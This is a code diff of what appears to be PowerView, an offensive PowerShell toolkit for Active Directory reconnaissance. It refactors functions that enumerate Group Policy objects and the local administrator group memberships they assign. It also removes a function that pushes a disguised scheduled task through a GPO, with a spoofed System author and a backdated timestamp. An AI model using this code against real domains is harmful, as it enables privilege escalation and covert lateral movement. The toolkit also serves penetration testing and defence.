$_.name } + } + + if ($Members) { + # extract out any/all filters...I hate you GPP + if ($_.filters) { + $Filters = $_.filters.GetEnumerator() | ForEach-Object { + New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} } } + else { + $Filters = $Null + } + + if ($Members -isnot [System.Array]) { $Members = @($Members) } + + $GroupsXML = New-Object PSObject + $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath + $GroupsXML | Add-Member Noteproperty 'Filters' $Filters + $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName + $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID + $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null + $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members + $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML') + $GroupsXML } - $Results.dispose() - $DFSSearcher.dispose() - } - catch { - Write-Warning "Get-DFSshareV2 error : $_" } - $DFSshares | Sort-Object -Unique -Property "RemoteServerName" + } + catch { + Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_" } } - $DFSshares = @() - - if ( ($Version -eq "all") -or ($Version.endsWith("1")) ) { - $DFSshares += Get-DFSshareV1 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } } - if ( ($Version -eq "all") -or ($Version.endsWith("2")) ) { - $DFSshares += Get-DFSshareV2 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize - } - - $DFSshares | Sort-Object -Property ("RemoteServerName","Name") -Unique } -######################################################## -# -# GPO related functions. -# -######################################################## - - -filter Get-GptTmpl { +function Get-DomainGPO { <# - .SYNOPSIS +.SYNOPSIS - Helper to parse a GptTmpl.inf policy file path into a custom object. +Return all GPOs or specific GPO objects in AD. - .PARAMETER GptTmplPath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty - The GptTmpl.inf file path name to parse. +.DESCRIPTION - .PARAMETER UsePSDrive +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all GPO objects for +the current domain are returned. To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. - Switch. Mount the target GptTmpl folder path as a temporary PSDrive. +.PARAMETER Identity - .EXAMPLE +A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. - PS C:\> Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" +.PARAMETER ComputerIdentity - Parse the default domain policy .inf for dev.testlab.local -#> +Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.). - [CmdletBinding()] - Param ( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - $GptTmplPath, +.PARAMETER UserIdentity - [Switch] - $UsePSDrive - ) +Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.). - if($UsePSDrive) { - # if we're PSDrives, create a temporary mount point - $Parts = $GptTmplPath.split('\') - $FolderPath = $Parts[0..($Parts.length-2)] -join '\' - $FilePath = $Parts[-1] - $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' +.PARAMETER Domain - Write-Verbose "Mounting path $GptTmplPath using a temp PSDrive at $RandDrive" +Specifies the domain to use for the query, defaults to the current domain. - try { - $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop - } - catch { - Write-Verbose "Error mounting path $GptTmplPath : $_" - return $Null - } +.PARAMETER LDAPFilter - # so we can cd/dir the new drive - $TargetGptTmplPath = $RandDrive + ":\" + $FilePath - } - else { - $TargetGptTmplPath = $GptTmplPath - } +Specifies an LDAP query string that is used to filter Active Directory objects. - Write-Verbose "GptTmplPath: $GptTmplPath" +.PARAMETER Properties - try { - Write-Verbose "Parsing $TargetGptTmplPath" - $TargetGptTmplPath | Get-IniContent -ErrorAction SilentlyContinue - } - catch { - Write-Verbose "Error parsing $TargetGptTmplPath : $_" - } +Specifies the properties of the output object to retrieve from the server. - if($UsePSDrive -and $RandDrive) { - Write-Verbose "Removing temp PSDrive $RandDrive" - Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force - } -} +.PARAMETER SearchBase +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. -filter Get-GroupsXML { -<# - .SYNOPSIS +.PARAMETER Server - Helper to parse a groups.xml file path into a custom object. +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER GroupsXMLpath +.PARAMETER SearchScope - The groups.xml file path name to parse. +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER UsePSDrive +.PARAMETER ResultPageSize - Switch. Mount the target groups.xml folder path as a temporary PSDrive. -#> +Specifies the PageSize to set for the LDAP searcher object. - [CmdletBinding()] - Param ( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - $GroupsXMLPath, +.PARAMETER ServerTimeLimit - [Switch] - $UsePSDrive - ) +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - if($UsePSDrive) { - # if we're PSDrives, create a temporary mount point - $Parts = $GroupsXMLPath.split('\') - $FolderPath = $Parts[0..($Parts.length-2)] -join '\' - $FilePath = $Parts[-1] - $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' +.PARAMETER SecurityMasks - Write-Verbose "Mounting path $GroupsXMLPath using a temp PSDrive at $RandDrive" +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. - try { - $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop - } - catch { - Write-Verbose "Error mounting path $GroupsXMLPath : $_" - return $Null - } +.PARAMETER Tombstone - # so we can cd/dir the new drive - $TargetGroupsXMLPath = $RandDrive + ":\" + $FilePath - } - else { - $TargetGroupsXMLPath = $GroupsXMLPath - } +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - try { - [XML]$GroupsXMLcontent = Get-Content $TargetGroupsXMLPath -ErrorAction Stop +.PARAMETER FindOne - # process all group properties in the XML - $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { +Only return one result object. - $Groupname = $_.Properties.groupName +.PARAMETER Credential - # extract the localgroup sid for memberof - $GroupSID = $_.Properties.groupSid - if(-not $GroupSID) { - if($Groupname -match 'Administrators') { - $GroupSID = 'S-1-5-32-544' - } - elseif($Groupname -match 'Remote Desktop') { - $GroupSID = 'S-1-5-32-555' - } - elseif($Groupname -match 'Guests') { - $GroupSID = 'S-1-5-32-546' - } - else { - $GroupSID = Convert-NameToSid -ObjectName $Groupname | Select-Object -ExpandProperty SID - } - } +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - # extract out members added to this group - $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { - if($_.sid) { $_.sid } - else { $_.name } - } +.PARAMETER Raw - if ($Members) { +Switch. Return raw results instead of translating the fields into a custom PSObject. - # extract out any/all filters...I hate you GPP - if($_.filters) { - $Filters = $_.filters.GetEnumerator() | ForEach-Object { - New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} - } - } - else { - $Filters = $Null - } +.EXAMPLE - if($Members -isnot [System.Array]) { $Members = @($Members) } +Get-DomainGPO -Domain testlab.local - $GPOGroup = New-Object PSObject - $GPOGroup | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath - $GPOGroup | Add-Member Noteproperty 'Filters' $Filters - $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName - $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID - $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Null - $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Members - $GPOGroup - } - } - } - catch { - Write-Verbose "Error parsing $TargetGroupsXMLPath : $_" - } +Return all GPOs for the testlab.local domain - if($UsePSDrive -and $RandDrive) { - Write-Verbose "Removing temp PSDrive $RandDrive" - Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force - } -} +.EXAMPLE +Get-DomainGPO -ComputerName windows1.testlab.local -function Get-NetGPO { -<# - .SYNOPSIS +Returns all GPOs applied windows1.testlab.local - Gets a list of all current GPOs in a domain. +.EXAMPLE - .PARAMETER GPOname +"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO - The GPO name to query for, wildcards accepted. +Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display +name of "Test GPO" - .PARAMETER DisplayName +.EXAMPLE - The GPO display name to query for, wildcards accepted. +Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon - .PARAMETER ComputerName +.EXAMPLE - Return all GPO objects applied to a given computer (FQDN). +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPO -Credential $Cred - .PARAMETER Domain +.OUTPUTS - The domain to query for GPOs, defaults to the current domain. +PowerView.GPO - .PARAMETER DomainController +Custom PSObject with translated GPO property fields. - Domain controller to reflect LDAP queries through. +PowerView.GPO.Raw - .PARAMETER ADSpath +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> - The LDAP source to search through - e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.GPO')] + [OutputType('PowerView.GPO.Raw')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, - .PARAMETER PageSize + [Parameter(ParameterSetName = 'ComputerIdentity')] + [Alias('ComputerName')] + [ValidateNotNullOrEmpty()] + [String] + $ComputerIdentity, - The PageSize to set for the LDAP searcher object. + [Parameter(ParameterSetName = 'UserIdentity')] + [Alias('UserName')] + [ValidateNotNullOrEmpty()] + [String] + $UserIdentity, - .PARAMETER Credential + [ValidateNotNullOrEmpty()] + [String] + $Domain, - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, - .EXAMPLE + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, - PS C:\> Get-NetGPO -Domain testlab.local - - Returns the GPOs in the 'testlab.local' domain. -#> - [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $GPOname = '*', + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DisplayName, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $ComputerName, + $SearchScope = 'Subtree', - [String] - $Domain, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] [String] - $DomainController, - - [String] - $ADSpath, + $SecurityMasks, - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw ) - begin { - $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $GPOSearcher = Get-DomainSearcher @SearcherArguments } - process { + PROCESS { if ($GPOSearcher) { + if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) { + $GPOAdsPaths = @() + if ($SearcherArguments['Properties']) { + $OldProperties = $SearcherArguments['Properties'] + } + $SearcherArguments['Properties'] = 'distinguishedname,dnshostname' + $TargetComputerName = $Null + + if ($PSBoundParameters['ComputerIdentity']) { + $SearcherArguments['Identity'] = $ComputerIdentity + $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 + if(-not $Computer) { + Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!" + } + $ObjectDN = $Computer.distinguishedname + $TargetComputerName = $Computer.dnshostname + } + else { + $SearcherArguments['Identity'] = $UserIdentity + $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1 + if(-not $User) { + Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!" + } + $ObjectDN = $User.distinguishedname + } - if($ComputerName) { - $GPONames = @() - $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize - - if(!$Computers) { - throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name" + # extract all OUs the target user/computer is a part of + $ObjectOUs = @() + $ObjectOUs += $ObjectDN.split(',') | ForEach-Object { + if($_.startswith('OU=')) { + $ObjectDN.SubString($ObjectDN.IndexOf("$($_),")) + } } - - # get the given computer's OU - $ComputerOUs = @() - ForEach($Computer in $Computers) { - # extract all OUs a computer is a part of - $DN = $Computer.distinguishedname + Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs" + + if ($ObjectOUs) { + # find all the GPOs linked to the user/computer's OUs + $SearcherArguments.Remove('Properties') + $InheritanceDisabled = $False + ForEach($ObjectOU in $ObjectOUs) { + $SearcherArguments['Identity'] = $ObjectOU + $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object { + # extract any GPO links for this particular OU the computer is a part of + if ($_.gplink) { + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $Parts = $_.split(';') + $GpoDN = $Parts[0] + $Enforced = $Parts[1] + + if ($InheritanceDisabled) { + # if inheritance has already been disabled and this GPO is set as "enforced" + # then add it, otherwise ignore it + if ($Enforced -eq 2) { + $GpoDN + } + } + else { + # inheritance not marked as disabled yet + $GpoDN + } + } + } + } - $ComputerOUs += $DN.split(",") | ForEach-Object { - if($_.startswith("OU=")) { - $DN.substring($DN.indexof($_)) + # if this OU has GPO inheritence disabled, break so additional OUs aren't processed + if ($_.gpoptions -eq 1) { + $InheritanceDisabled = $True + } } } } - - Write-Verbose "ComputerOUs: $ComputerOUs" - # find all the GPOs linked to the computer's OU - ForEach($ComputerOU in $ComputerOUs) { - $GPONames += Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $ComputerOU -FullData -PageSize $PageSize | ForEach-Object { - # get any GPO links - write-verbose "blah: $($_.name)" - $_.gplink.split("][") | ForEach-Object { - if ($_.startswith("LDAP")) { - $_.split(";")[0] + if ($TargetComputerName) { + # find all the GPOs linked to the computer's site + $ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName + if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { + $SearcherArguments['Identity'] = $ComputerSite + $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object { + if($_.gplink) { + # extract any GPO links for this particular site the computer is a part of + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $_.split(';')[0] + } + } } } } } - - Write-Verbose "GPONames: $GPONames" - # find any GPOs linked to the site for the given computer - $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName - if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { - $GPONames += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object { - if($_.gplink) { - $_.gplink.split("][") | ForEach-Object { - if ($_.startswith("LDAP")) { - $_.split(";")[0] - } + # find any GPOs linked to the user/computer's domain + $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC=')) + $SearcherArguments.Remove('Identity') + $SearcherArguments.Remove('Properties') + $SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)" + $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object { + if($_.gplink) { + # extract any GPO links for this particular domain the computer is a part of + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $_.split(';')[0] } } } } + Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths" - $GPONames | Where-Object{$_ -and ($_ -ne '')} | ForEach-Object { + # restore the old properites to return, if set + if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties } + else { $SearcherArguments.Remove('Properties') } + $SearcherArguments.Remove('Identity') + $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object { # use the gplink as an ADS path to enumerate all GPOs for the computer - $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_ -PageSize $PageSize - $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))" - - try { - $Results = $GPOSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - $Out = Convert-LDAPProperty -Properties $_.Properties - $Out | Add-Member Noteproperty 'ComputerName' $ComputerName - $Out + $SearcherArguments['SearchBase'] = $_ + $SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)" + Get-DomainObject @SearcherArguments | ForEach-Object { + if ($PSBoundParameters['Raw']) { + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') } - $Results.dispose() - $GPOSearcher.dispose() - } - catch { - Write-Warning $_ + else { + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO') + } + $_ } } } - else { - if($DisplayName) { - $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(displayname=$DisplayName))" + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match 'LDAP://|^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GPOSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GPOSearcher) { + Write-Warning "[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -match '{.*}') { + $IdentityFilter += "(name=$IdentityInstance)" + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(displayname=$IdentityInstance)" + } + } } - else { - $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))" + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" } - try { - $Results = $GPOSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - if($ADSPath -and ($ADSpath -Match '^GC://')) { - $Properties = Convert-LDAPProperty -Properties $_.Properties + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)" + Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() } + else { $Results = $GPOSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $GPO = $_ + $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') + } + else { + if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) { + $GPO = Convert-LDAPProperty -Properties $_.Properties try { - $GPODN = $Properties.distinguishedname - $GPODomain = $GPODN.subString($GPODN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' - $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($Properties.cn)" - $Properties | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath - $Properties + $GPODN = $GPO.distinguishedname + $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)" + $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath } catch { - $Properties + Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)" } } else { - # convert/process the LDAP fields for each result - Convert-LDAPProperty -Properties $_.Properties + $GPO = Convert-LDAPProperty -Properties $_.Properties } + $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO') } - $Results.dispose() - $GPOSearcher.dispose() + $GPO } - catch { - Write-Warning $_ + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_" + } } + $GPOSearcher.dispose() } } } } -function New-GPOImmediateTask { +function Get-DomainGPOLocalGroup { <# - .SYNOPSIS +.SYNOPSIS - Builds an 'Immediate' schtask to push out through a specified GPO. +Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' +or Group Policy preferences. Also return their user membership mappings, if they exist. - .PARAMETER TaskName +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID - Name for the schtask to recreate. Required. +.DESCRIPTION - .PARAMETER Command +First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed +arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or +group membership is set through Group Policy Preferences groups.xml files. For any +GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' +section data is processed if present. Any found Groups.xml files are parsed with +Get-GroupsXML and those memberships are returned as well. - The command to execute with the task, defaults to 'powershell' +.PARAMETER Identity - .PARAMETER CommandArguments +A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. - The arguments to supply to the -Command being launched. +.PARAMETER ResolveMembersToSIDs - .PARAMETER TaskDescription +Switch. Indicates that any member names should be resolved to their domain SIDs. - An optional description for the task. +.PARAMETER Domain - .PARAMETER TaskAuthor - - The displayed author of the task, defaults to ''NT AUTHORITY\System' +Specifies the domain to use for the query, defaults to the current domain. - .PARAMETER TaskModifiedDate - - The displayed modified date for the task, defaults to 30 days ago. +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone - .PARAMETER GPOname +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - The GPO name to build the task for. +.PARAMETER Credential - .PARAMETER GPODisplayName +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - The GPO display name to build the task for. +.EXAMPLE - .PARAMETER Domain +Get-DomainGPOLocalGroup - The domain to query for the GPOs, defaults to the current domain. +Returns all local groups set by GPO along with their members and memberof. - .PARAMETER DomainController +.EXAMPLE - Domain controller to reflect LDAP queries through. +Get-DomainGPOLocalGroup -ResolveMembersToSIDs - .PARAMETER ADSpath +Returns all local groups set by GPO along with their members and memberof, +and resolve any members to their domain SIDs. - The LDAP source to search through - e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" +.EXAMPLE - .PARAMETER Credential +'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target. +Return any GPO-set groups for the GPO with the given name/GUID. - .EXAMPLE +.EXAMPLE - PS> New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-c "123 | Out-File C:\Temp\debug.txt"' -Force +Get-DomainGPOLocalGroup 'Desktops' - Create an immediate schtask that executes the specified PowerShell arguments and - push it out to the 'SecurePolicy' GPO, skipping the confirmation prompt. +Return any GPO-set groups for the GPO with the given display name. - .EXAMPLE +.EXAMPLE - PS> New-GPOImmediateTask -GPODisplayName SecurePolicy -Remove -Force +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOLocalGroup -Credential $Cred - Remove all schtasks from the 'SecurePolicy' GPO, skipping the confirmation prompt. +.LINK + +https://morgansimonsenblog.azurewebsites.net/tag/groups/ #> - [CmdletBinding(DefaultParameterSetName = 'Create')] - Param ( - [Parameter(ParameterSetName = 'Create', Mandatory = $True)] - [String] - [ValidateNotNullOrEmpty()] - $TaskName, - [Parameter(ParameterSetName = 'Create')] - [String] - [ValidateNotNullOrEmpty()] - $Command = 'powershell', + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GPOGroup')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, - [Parameter(ParameterSetName = 'Create')] - [String] - [ValidateNotNullOrEmpty()] - $CommandArguments, + [Switch] + $ResolveMembersToSIDs, - [Parameter(ParameterSetName = 'Create')] - [String] [ValidateNotNullOrEmpty()] - $TaskDescription = '', - - [Parameter(ParameterSetName = 'Create')] [String] - [ValidateNotNullOrEmpty()] - $TaskAuthor = 'NT AUTHORITY\System', + $Domain, - [Parameter(ParameterSetName = 'Create')] - [String] [ValidateNotNullOrEmpty()] - $TaskModifiedDate = (Get-Date (Get-Date).AddDays(-30) -Format u).trim("Z"), - - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] + [Alias('Filter')] [String] - $GPOname, + $LDAPFilter, - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $GPODisplayName, + $SearchBase, - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $Domain, + $Server, - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] - [String] - $DomainController, - - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $ADSpath, + $SearchScope = 'Subtree', - [Parameter(ParameterSetName = 'Create')] - [Parameter(ParameterSetName = 'Remove')] - [Switch] - $Force, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, 